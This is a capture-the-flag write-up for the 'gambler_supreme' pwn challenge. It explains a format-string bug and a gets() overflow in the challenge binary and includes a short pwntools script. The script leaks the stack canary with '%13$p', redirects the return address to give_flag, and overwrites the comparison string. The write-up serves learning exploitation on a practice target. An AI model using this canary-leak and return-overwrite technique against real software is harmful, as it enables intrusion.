0x0 Introduction

gambler_supreme 50 PointsSOLVED
The Casino, but with a cool new feature!

You must create a flag.txt in the same folder as the binary for it to run.
nc ctf.b01lers.com 9201

Author: robotearthpizza
Difficulty: Hard

0x1 Mitigation

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

0x2 Vulnerability

it marks as hard but actually very easy.

function sym.casino ask for a 4 byte string using gets, then it compare with a random string generate by sym.imp.rand(). In this challenge, the function for print out flag is not called in binary. So we need to control rip and jump to the function.

│           ; var signed int64_t var_34h @ rbp-0x34
│           ; var char *format @ rbp-0x30
│           ; var char *s1 @ rbp-0x20
│           ; var int64_t canary @ rbp-0x8
{
    do {
        // generate random string
        sym.imp.gets(&format);
        sym.imp.printf("Your guess: ");
        sym.imp.printf(&format);
        sym.imp.putchar(10);
        sym.imp.printf("Correct word: %s\n", &s1);
        iVar1 = sym.imp.strcmp(&s1);
        // add or subtract balance depend on the result
    } while (_obj.balance < 1000);
    sym.imp.printf("Drats, the cat snuck in and deleted the code for give_flag...");
    return;
}

It have both gets to overwrite and printf to leak data.

using printf, we can leak canary.

then if we overwrite rip to give_flag using gets, the flag when be print when function return.

finally we uses gets again, overwrite s1, make format and s1 same.

0x3 Exploit

io = start()

io.sendlineafter(b"(inclusive):",b"1")
io.sendlineafter(b"letters: ",b"%13$p")
lp(io.recvuntil(b"Your guess: "))
canary = int(io.recvuntil(b"\n",drop=True),16)
lp("canary",hex(canary))
io.sendlineafter(b"letters: ",flat({
    0x30 - 0x8:canary,
    0x30 + 0x8: exe.sym["give_flag"]
}))
try:
    while True:
        lp(io.sendlineafter(b"letters: ",b"AAAAAAA\x00AAAAAAA\x00"))
except:
    pass
print(io.recv())

io.interactive()

0x4 Flag

forgot